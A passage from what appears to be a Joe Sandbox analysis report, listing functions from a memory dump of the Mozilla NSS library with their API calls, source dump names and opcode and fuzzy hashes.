Opcode Fuzzy Hash: 622731602dd0914d5524e1c10f261fafd50abdef5da9d7bdbe09ce164cbb4d41
Instruction Fuzzy Hash: 3A71CCB2A043019FD710CF24D940A4AB7F5BF8935CF144929E8A993B21E731F959CB92

Function 6C78DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C78DD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C78DE77

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: e4361860d3064e1a3142c2b0be16816e57d7185d5584e2b726f10a4009a12c0a
Instruction ID: bae86da22015560262eb7fdedc11d92bc8436c109f3e3ce9849e8dad310ac2d4
Opcode Fuzzy Hash: e4361860d3064e1a3142c2b0be16816e57d7185d5584e2b726f10a4009a12c0a
Instruction Fuzzy Hash: CE717971A01316CFCB20CF9AC6C0689B7B4BF59718F25817EDA586B702D770A901CF90

Function 6C759E00 Relevance: 7.7, APIs: 5, Instructions: 157COMMON

Download Yara Rule

APIs

PR_ExitMonitor.NSS3(?), ref: 6C759EB2
PR_Sleep.NSS3(00000000), ref: 6C759EBC
PR_EnterMonitor.NSS3(?), ref: 6C759ED8
TlsGetValue.KERNEL32 ref: 6C759F46
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C759F8B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Monitor$EnterErrorExitSleepValue
String ID:
API String ID: 2181969484-0
Opcode ID: 36cd246d93d9b7ce3704a8304126a0bff72949cd9da833c21d1247624d8c881d
Instruction ID: aa2d35918f8c8b98c45d746b8fc2159b6365ba6f1e40295b3c0069e0a7693c0c
Opcode Fuzzy Hash: 36cd246d93d9b7ce3704a8304126a0bff72949cd9da833c21d1247624d8c881d
Instruction Fuzzy Hash: 2E5147B2B042159BEB109E29DA447AE77A5AFA070CF544538DC189B682DF33D867CBC1

Function 6C6FDFA0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 6C6FAB10: DeleteCriticalSection.KERNEL32(D958E852,6C701397,5B5F5EC0,?,?,6C6FB1EE,2404110F,?,?), ref: 6C6FAB3C
Part of subcall function 6C6FAB10: free.MOZGLUE(D958E836,?,6C6FB1EE,2404110F,?,?), ref: 6C6FAB49
Part of subcall function 6C6FAB10: DeleteCriticalSection.KERNEL32(5D5E6C8F), ref: 6C6FAB5C
Part of subcall function 6C6FAB10: free.MOZGLUE(5D5E6C83), ref: 6C6FAB63
Part of subcall function 6C6FAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C6FAB6F
Part of subcall function 6C6FAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C6FAB76

TlsGetValue.KERNEL32(?,?,6C6FB266,6C7015C6,?,?,6C7015C6), ref: 6C6FDFDA
EnterCriticalSection.KERNEL32(?,?,?,6C6FB266,6C7015C6,?,?,6C7015C6), ref: 6C6FDFF3
PK11_IsFriendly.NSS3(?,?,?,?,6C6FB266,6C7015C6,?,?,6C7015C6), ref: 6C6FE029
PK11_IsLoggedIn.NSS3 ref: 6C6FE046

Part of subcall function 6C708F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C708FAF
Part of subcall function 6C708F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C708FD1
Part of subcall function 6C708F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C708FFA
Part of subcall function 6C708F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C709013
Part of subcall function 6C708F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C709042
Part of subcall function 6C708F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C70905A
Part of subcall function 6C708F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C709073
Part of subcall function 6C708F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C6FDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C709111

PR_Unlock.NSS3(?,?,?,?,6C6FB266,6C7015C6,?,?,6C7015C6), ref: 6C6FE149

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
String ID:
API String ID: 4224391822-0
Opcode ID: 47cd567b346474fdd9e370a95920cc3a3ebb7a5f70580714acf499d2d4ed86f7
Instruction ID: e97d814004053001ab958507284afca012d8c8799c9ab64d1bc1b56b8ab54909
Opcode Fuzzy Hash: 47cd567b346474fdd9e370a95920cc3a3ebb7a5f70580714acf499d2d4ed86f7
Instruction Fuzzy Hash: 83515870600601CFDB10DF29C58476ABBF2BF49308F15896DD8A98B751D731E886CBDA

Function 6C70BE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C70BF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C70BF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6E9F71,?,?,00000000), ref: 6C70BF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6C70BFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C70C014

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: 76e102ba1359856a12993b744060c6d861aa677e9ac77f84c88236885e94e28e
Instruction ID: b23530f3f76dd7457f105ed5f2afd2ad587f7973c64f34d73442fdfd63c28158
Opcode Fuzzy Hash: 76e102ba1359856a12993b744060c6d861aa677e9ac77f84c88236885e94e28e
Instruction Fuzzy Hash: 9D41B4B1B012059BEB00DE65CE48BAA73F9AF45248F204138E919D7B41EB31FA05CBA1

Function 6C6DEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6DEDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C6DEE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C6DEECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6DEEEB
free.MOZGLUE(?), ref: 6C6DEEF6

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: dd4f2630791e664cec944f1e9256f9c17b966ed904ee2b2a90d64cc1d4782fdd
Instruction ID: 2419086b34f21af4dca588dc6f88ae28be1f4ff3845871052f51cf9b32ac64aa
Opcode Fuzzy Hash: dd4f2630791e664cec944f1e9256f9c17b966ed904ee2b2a90d64cc1d4782fdd
Instruction Fuzzy Hash: 9B31E6B1A006029BD7209F29CC44766BBF4FB46319F160638E85A87A51D731F815C7D5

Function 6C6F1F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6F1F1C

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C809EBC), ref: 6C6F1FB8
SEC_ASN1EncodeItem_Util.NSS3(6C809E9C,?,?,6C809E9C), ref: 6C6F200A
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C6F2020

Part of subcall function 6C6E6A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C6EAD50,?,?), ref: 6C6E6A98

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6F2030

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
String ID:
API String ID: 1390266749-0
Opcode ID: 104757f1c04ba046db938ebf0d06ded563c1bbbb8733365031ad0beacdc0cdab
Instruction ID: 308196cea7cc8816fe6091fb59281269e3c41d0e7510174df0e65bb2c785b687
Opcode Fuzzy Hash: 104757f1c04ba046db938ebf0d06ded563c1bbbb8733365031ad0beacdc0cdab
Instruction Fuzzy Hash: 77214DF6902501BBF7004A19DD04FAA7769FF4535CF144211E83892F80E731E529CBA5

Function 6C6E1DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6E1E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6E1E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E1E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C6E1E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C6E1EAD

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: d5d8ecf2a0d58a6b71266aebcee3666bab5f0ce3caa6e615c11015b62bf4bb5b
Instruction ID: d74dd38eecbaf8a20bbc7e66cd36161a235826f8c7866a5d7ef4e988504c90cb
Opcode Fuzzy Hash: d5d8ecf2a0d58a6b71266aebcee3666bab5f0ce3caa6e615c11015b62bf4bb5b
Instruction Fuzzy Hash: 76216772E0A310A7D7008F69DC48B9B7394DB88328F148639FD1D57782E730D90A87D6

Function 6C7F1E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C7F1E5C

Part of subcall function 6C7A9BF0: TlsGetValue.KERNEL32(?,?,?,6C7F0A75), ref: 6C7A9C07

PR_Lock.NSS3(00000000), ref: 6C7F1E75
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C7F1EAB
PR_GetCurrentThread.NSS3 ref: 6C7F1ED0
PR_Unlock.NSS3(?), ref: 6C7F1EE8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CurrentThread$ErrorLockUnlockValue
String ID:
API String ID: 121300776-0
Opcode ID: c90b5e21dc256338f6c3826e67990d2e5a8239e05806ef5c60773a3131360b8e
Instruction ID: 1ba7d1cde9e30f8ad2fdc9745078f950f06374eb0db4af98364f9709b202ca9b
Opcode Fuzzy Hash: c90b5e21dc256338f6c3826e67990d2e5a8239e05806ef5c60773a3131360b8e
Instruction Fuzzy Hash: 6221CFB5A14512AFD710CF29DA84A46B7B8FF4472AF258329D8258BB41D331FC26CBD1

Function 6C73BE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C6EE708,00000000,00000000,00000004,00000000), ref: 6C73BE6A

Part of subcall function 6C740840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7408B4

SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6F04DC,?), ref: 6C73BE7E

Part of subcall function 6C73FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C738D2D,?,00000000,?), ref: 6C73FB85
Part of subcall function 6C73FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C73FBB1

SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C73BEC2
PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6F04DC,?,?), ref: 6C73BED7
SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C73BEEB

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
String ID:
API String ID: 1367977078-0
Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction ID: 12c489a444f6c5e0c1f7a50e1bc991d18e21e369676c3019c5d3b9b772a6a348
Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction Fuzzy Hash: 4B110866644A3667E7008969AF88F57736D9B80758F046135FE0C86B93E731E80487E2

Function 6C6EAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C6E3FFF,00000000,?,?,?,?,?,6C6E1A1C,00000000,00000000), ref: 6C6EADA7

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C6E3FFF,00000000,?,?,?,?,?,6C6E1A1C,00000000,00000000), ref: 6C6EADB4

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C6E3FFF,?,?,?,?,6C6E3FFF,00000000,?,?,?,?,?,6C6E1A1C,00000000), ref: 6C6EADD5

Part of subcall function 6C73FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C738D2D,?,00000000,?), ref: 6C73FB85
Part of subcall function 6C73FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C73FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C8094B0,?,?,?,?,?,?,?,?,6C6E3FFF,00000000,?), ref: 6C6EADEC

Part of subcall function 6C73B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8118D0,?), ref: 6C73B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6E3FFF), ref: 6C6EAE3C

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 2b0671f4fcb295618216d1b1b21588059ea3ce2cd5170f4cc7d6f2c7357e3236
Instruction ID: 5df43e9a98b84c93fedaa4a3cdb1a6c22e3713c553b17bf91af690e54e7cc4a7
Opcode Fuzzy Hash: 2b0671f4fcb295618216d1b1b21588059ea3ce2cd5170f4cc7d6f2c7357e3236
Instruction Fuzzy Hash: C311AB31E002041BE7109B659D48BBF77F8DF5524CF008629EC1986742FB20E919C2E6

Function 6C6F8FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C700710), ref: 6C6F8FF1
PR_CallOnce.NSS3(6C842158,6C6F9150,00000000,?,?,?,6C6F9138,?,6C700710), ref: 6C6F9029
calloc.MOZGLUE(00000001,00000000,?,?,6C700710), ref: 6C6F904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C700710), ref: 6C6F9066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C700710), ref: 6C6F9078

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 9260a3990bb051436f13546f91ab1ec9587cf4d8e4ddc22b416196cca29abe0a
Instruction ID: d0730fddb6023f11e2c7e7e4828e4edc928b8bc56ab0651bd8977f0394d9fe36
Opcode Fuzzy Hash: 9260a3990bb051436f13546f91ab1ec9587cf4d8e4ddc22b416196cca29abe0a
Instruction Fuzzy Hash: A211482170421157E7201EAEAC08A6772AEEB827ACF000535FC64C2B40F753CC46C3E9

Function 6C70CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C721E10: TlsGetValue.KERNEL32 ref: 6C721E36
Part of subcall function 6C721E10: EnterCriticalSection.KERNEL32(?,?,?,6C6FB1EE,2404110F,?,?), ref: 6C721E4B
Part of subcall function 6C721E10: PR_Unlock.NSS3 ref: 6C721E76

free.MOZGLUE(?,6C70D079,00000000,00000001), ref: 6C70CDA5
PK11_FreeSymKey.NSS3(?,6C70D079,00000000,00000001), ref: 6C70CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C70D079,00000000,00000001), ref: 6C70CDCF
DeleteCriticalSection.KERNEL32(?,6C70D079,00000000,00000001), ref: 6C70CDE2
free.MOZGLUE(?), ref: 6C70CDE9

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 1f0000289378447aa54a4b352ba0f2a769cdf420c746885fa65ebaa312f8fc2a
Instruction ID: ebd3fd645e2e8bdc2b4870ce934b34641637532b38412e4a1a653f84368158a7
Opcode Fuzzy Hash: 1f0000289378447aa54a4b352ba0f2a769cdf420c746885fa65ebaa312f8fc2a
Instruction Fuzzy Hash: 6C11C2F2B01125BBDB10AEA5EE49996B7ACFF0426E7140531E909C7E01E732E424C7E2

Function 6C743D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C7438A2), ref: 6C743DB0
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C7438A2), ref: 6C743DBF

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C7438A2), ref: 6C743DD9
_wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6C7438A2), ref: 6C743DE7
free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6C7438A2), ref: 6C743DF8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
